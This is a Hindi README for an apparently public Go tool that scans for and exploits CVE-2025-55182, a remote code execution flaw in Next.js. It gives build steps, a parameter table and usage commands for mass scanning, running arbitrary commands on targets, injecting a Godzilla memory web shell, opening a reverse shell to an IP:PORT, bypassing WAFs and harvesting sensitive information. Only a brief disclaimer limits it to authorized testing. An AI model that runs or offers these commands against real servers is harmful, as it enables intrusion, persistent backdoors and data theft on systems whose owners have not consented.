
Go-आधारित स्कैनर और शोषण उपकरण CVE-2025-55182 (Next.js RCE) के लिए। बैच स्कैनिंग, कमांड निष्पादन, गॉडज़िला मेमोरी शेल इंजेक्शन, रिवर्स शेल और WAF बायपास का समर्थन करता है।
CVE-2025-55182 भेद्यता स्कैनिंग और शोषण उपकरण, Next.js अनुप्रयोगों में रिमोट कोड निष्पादन भेद्यता के लिए। बैच डिटेक्शन, कमांड निष्पादन, गॉडज़िला मेमोरी शेल इंजेक्शन और रिवर्स शेल फ़ंक्शन का समर्थन करता है।
⚠️ यह उपकरण केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए है, इसे अवैध उद्देश्यों के लिए उपयोग न करें।
.txt फ़ाइलों वाले फ़ोल्डर का समर्थन करता है।success.json में सहेजें, और वैकल्पिक रूप से भेद्यता URL को निर्दिष्ट फ़ाइल में आउटपुट करें।[
]
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
go build -o cve-2025-55182 main.go
./cve-2025-55182 -h
| पैरामीटर | प्रकार | डिफ़ॉल्ट मान | विवरण |
|---|---|---|---|
-u | string | कोई नहीं | एकल लक्ष्य URL (जैसे http://example.com:3000) |
-f | string | कोई नहीं | URL सूची वाली फ़ाइल (प्रति पंक्ति एक) |
-d | string | कोई नहीं | एकाधिक .txt फ़ाइलों वाला फ़ोल्डर |
-o | string | कोई नहीं | आउटपुट फ़ाइल (भेद्यता URL सहेजें, प्रति पंक्ति एक) |
-t | int | 10 | समवर्ती थ्रेड गणना |
-to | int | 10 | अनुरोध टाइमआउट (सेकंड) |
-c | string | कोई नहीं | निष्पादित करने के लिए कमांड (जैसे id) |
-m | string | कोई नहीं | मोड: waf (WAF बाइपास सक्षम करें) |
-p | string | कोई नहीं | HTTP प्रॉक्सी (जैसे http://127.0.0.1:8080) |
-g | bool | false | गॉडज़िला मेमोरी शेल इंजेक्शन सक्षम करें |
-rs | string | कोई नहीं | रिवर्स शेल पता (प्रारूप IP:PORT) |
-dv | bool | false | विस्तृत मोड (प्रत्येक URL की स्कैन प्रक्रिया प्रिंट करें) |
-es | bool | false | संवेदनशील जानकारी स्कैन मोड |
./cve-2025-55182 -u http://target.com:3000
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
./cve-2025-55182 -u http://target.com:3000 -g
सफल इंजेक्शन के बाद, उपकरण गॉडज़िला का कनेक्शन पता, पासवर्ड, कुंजी और हेडर जानकारी आउटपुट करेगा।
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
success.json: स्वचालित रूप से सभी सफलतापूर्वक शोषित लक्ष्यों का विस्तृत विवरण सहेजता है (कमांड आउटपुट, गॉडज़िला कॉन्फ़िगरेशन आदि सहित)।-o द्वारा निर्दिष्ट फ़ाइल: भेद्यता URL सूची सहेजता है (प्रति पंक्ति एक)।स्कैनिंग प्रक्रिया के दौरान प्रगति बार और खोजी गई भेद्यताएँ वास्तविक समय में प्रदर्शित की जाएँगी, और अंत में सांख्यिकीय जानकारी आउटपुट की जाएगी।
-p पैरामीटर का उपयोग करें।-to पैरामीटर मान बढ़ाएँ।यह उपकरण केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए है; उपयोगकर्ता को सभी कानूनी जिम्मेदारियाँ स्वयं वहन करनी होंगी। डेवलपर किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।